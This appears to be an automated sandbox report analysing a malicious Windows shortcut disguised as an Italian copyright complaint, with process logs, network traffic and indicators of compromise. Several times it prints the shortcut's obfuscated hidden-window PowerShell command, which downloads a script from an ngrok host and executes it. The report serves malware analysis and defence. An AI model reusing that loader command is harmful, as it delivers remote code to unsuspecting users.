Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
PowerShell
1
DLL Side-Loading
11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping11
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory21
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk18%ReversingLabsShortcut.Trojan.Pantera
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk39%VirustotalBrowse
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
5awvoe1sr8b6b5g9cfxz.ngrok.app
3.6.115.64
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50betrue
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    3.6.115.64
    5awvoe1sr8b6b5g9cfxz.ngrok.appUnited States
    16509AMAZON-02UStrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1578153
    Start date and time:2024-12-19 10:37:58 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 1m 53s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name:Potential for more IOCs and behavior
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
    Detection:MAL
    Classification:mal76.winLNK@4/3@1/1
    Cookbook Comments:
    • Found application associated with file extension: .lnk
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded IPs from analysis (whitelisted): 13.107.246.63
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
    • Not all processes where analyzed, report is missing behavior information
    TimeTypeDescription
    04:38:50API Interceptor30x Sleep call for process: powershell.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    3.6.115.64fern_wifi_recon%2.34.exeGet hashmaliciousMetasploitBrowse
      CV.vbsGet hashmaliciousXmrigBrowse
        ae6T8jJueq.exeGet hashmaliciousNjratBrowse
          nOZ2Oqnzbz.exeGet hashmaliciousNjratBrowse
            ZB7Ot9MOic.exeGet hashmaliciousNjratBrowse
              etJZk4UQhS.exeGet hashmaliciousNjratBrowse
                jango.exeGet hashmaliciousXWormBrowse
                  cracksetup.exeGet hashmaliciousNanocoreBrowse
                    LocalStaFvjUblU.exeGet hashmaliciousnjRatBrowse
                      558EofiXYO.exeGet hashmaliciousnjRatBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        5awvoe1sr8b6b5g9cfxz.ngrok.appRapporteer inbreuk op auteursrechten.lnk.d.lnkGet hashmaliciousUnknownBrowse
                        • 3.125.102.39
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AMAZON-02USpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 184.77.160.143
                        DeltaX.exeGet hashmaliciousUnknownBrowse
                        • 54.230.112.122
                        CROC000400 .pdfGet hashmaliciousUnknownBrowse
                        • 108.158.75.106
                        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 35.167.216.68
                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 35.156.171.87
                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 3.163.158.110
                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 3.248.220.130
                        https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                        • 13.227.8.47
                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 13.232.112.86
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eDHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                        • 3.6.115.64
                        4089137200.exeGet hashmaliciousAgentTeslaBrowse
                        • 3.6.115.64
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                        • 3.6.115.64
                        Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                        • 3.6.115.64
                        Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                        • 3.6.115.64
                        main1.batGet hashmaliciousAbobus ObfuscatorBrowse
                        • 3.6.115.64
                        66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                        • 3.6.115.64
                        dlhost.exeGet hashmaliciousXWormBrowse
                        • 3.6.115.64
                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                        • 3.6.115.64
                        Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 3.6.115.64
                        No context
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1628158735648508
                        Encrypted:false
                        SSDEEP:3:Nlllul5mxllp:NllU4x/
                        MD5:3A925CB766CE4286E251C26E90B55CE8
                        SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                        SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                        SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:@...e................................................@..........
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
                        Entropy (8bit):3.7223232228578276
                        TrID:
                        • Windows Shortcut (20020/1) 100.00%
                        File name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
                        File size:2'590 bytes
                        MD5:3c56fd0e1bbabcfdeaabe5ee6e29bfa7
                        SHA1:1376441bc8171553125dac0415240a81859ee8f7
                        SHA256:0c64dd1718afa8b2cceb2727a322ddb14f595b29426c0c018a2231e61a73f6e5
                        SHA512:e9a8df752694ca6d184c480beb27d12a2f48f1b7d084b7372ec8387046db47fb7e84fd048fb1fe3a32ad63e0454345febc6d3a32b176d20d281c0388b60835e7
                        SSDEEP:48:8GIgax4PsU/rJETWap8irXBblgGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2rWTWauiFhgdl2uWvZg5Y
                        TLSH:5D51BF252BD91734F3B74E754976A2519A7AB946BC224F1D408042480C62B19EC75F2B
                        File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......
                        Icon Hash:72d282828e8d8dd5

                        General

                        Relative Path:..\..\..\..\Windows\System32\cmd.exe
                        Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 19, 2024 10:38:51.996001005 CET49709443192.168.2.63.6.115.64
                        Dec 19, 2024 10:38:51.996037006 CET443497093.6.115.64192.168.2.6
                        Dec 19, 2024 10:38:51.996115923 CET49709443192.168.2.63.6.115.64
                        Dec 19, 2024 10:38:52.005402088 CET49709443192.168.2.63.6.115.64
                        Dec 19, 2024 10:38:52.005414963 CET443497093.6.115.64192.168.2.6
                        Dec 19, 2024 10:38:53.615222931 CET443497093.6.115.64192.168.2.6
                        Dec 19, 2024 10:38:53.615309954 CET49709443192.168.2.63.6.115.64
                        Dec 19, 2024 10:38:53.687993050 CET49709443192.168.2.63.6.115.64
                        Dec 19, 2024 10:38:53.688019037 CET443497093.6.115.64192.168.2.6
                        Dec 19, 2024 10:38:53.688478947 CET443497093.6.115.64192.168.2.6
                        Dec 19, 2024 10:38:53.705430031 CET49709443192.168.2.63.6.115.64
                        Dec 19, 2024 10:38:53.747335911 CET443497093.6.115.64192.168.2.6
                        Dec 19, 2024 10:38:54.374485016 CET443497093.6.115.64192.168.2.6
                        Dec 19, 2024 10:38:54.374577999 CET443497093.6.115.64192.168.2.6
                        Dec 19, 2024 10:38:54.374633074 CET49709443192.168.2.63.6.115.64
                        Dec 19, 2024 10:38:54.386674881 CET49709443192.168.2.63.6.115.64
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 19, 2024 10:38:51.557241917 CET5624053192.168.2.61.1.1.1
                        Dec 19, 2024 10:38:51.984822989 CET53562401.1.1.1192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 19, 2024 10:38:51.557241917 CET192.168.2.61.1.1.10x461fStandard query (0)5awvoe1sr8b6b5g9cfxz.ngrok.appA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 19, 2024 10:38:51.984822989 CET1.1.1.1192.168.2.60x461fNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.115.64A (IP address)IN (0x0001)false
                        Dec 19, 2024 10:38:51.984822989 CET1.1.1.1192.168.2.60x461fNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.98.232A (IP address)IN (0x0001)false
                        Dec 19, 2024 10:38:51.984822989 CET1.1.1.1192.168.2.60x461fNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.122.107A (IP address)IN (0x0001)false
                        Dec 19, 2024 10:38:51.984822989 CET1.1.1.1192.168.2.60x461fNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.115.182A (IP address)IN (0x0001)false
                        Dec 19, 2024 10:38:51.984822989 CET1.1.1.1192.168.2.60x461fNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.30.85A (IP address)IN (0x0001)false
                        • 5awvoe1sr8b6b5g9cfxz.ngrok.app
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.6497093.6.115.644434176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-12-19 09:38:53 UTC218OUTGET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                        Host: 5awvoe1sr8b6b5g9cfxz.ngrok.app
                        Connection: Keep-Alive
                        2024-12-19 09:38:54 UTC162INHTTP/1.1 404 Not Found
                        Connection: close
                        Content-Type: text/plain
                        Ngrok-Error-Code: ERR_NGROK_3200
                        Date: Thu, 19 Dec 2024 09:38:54 GMT
                        Content-Length: 67
                        2024-12-19 09:38:54 UTC67INData Raw: 54 75 6e 6e 65 6c 20 35 61 77 76 6f 65 31 73 72 38 62 36 62 35 67 39 63 66 78 7a 2e 6e 67 72 6f 6b 2e 61 70 70 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a 0d 0a 45 52 52 5f 4e 47 52 4f 4b 5f 33 32 30 30 0d 0a
                        Data Ascii: Tunnel 5awvoe1sr8b6b5g9cfxz.ngrok.app not foundERR_NGROK_3200


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:1
                        Start time:04:38:47
                        Start date:19/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
                        Imagebase:0x7ff7dc3d0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:04:38:47
                        Start date:19/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:04:38:48
                        Start date:19/12/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        No disassembly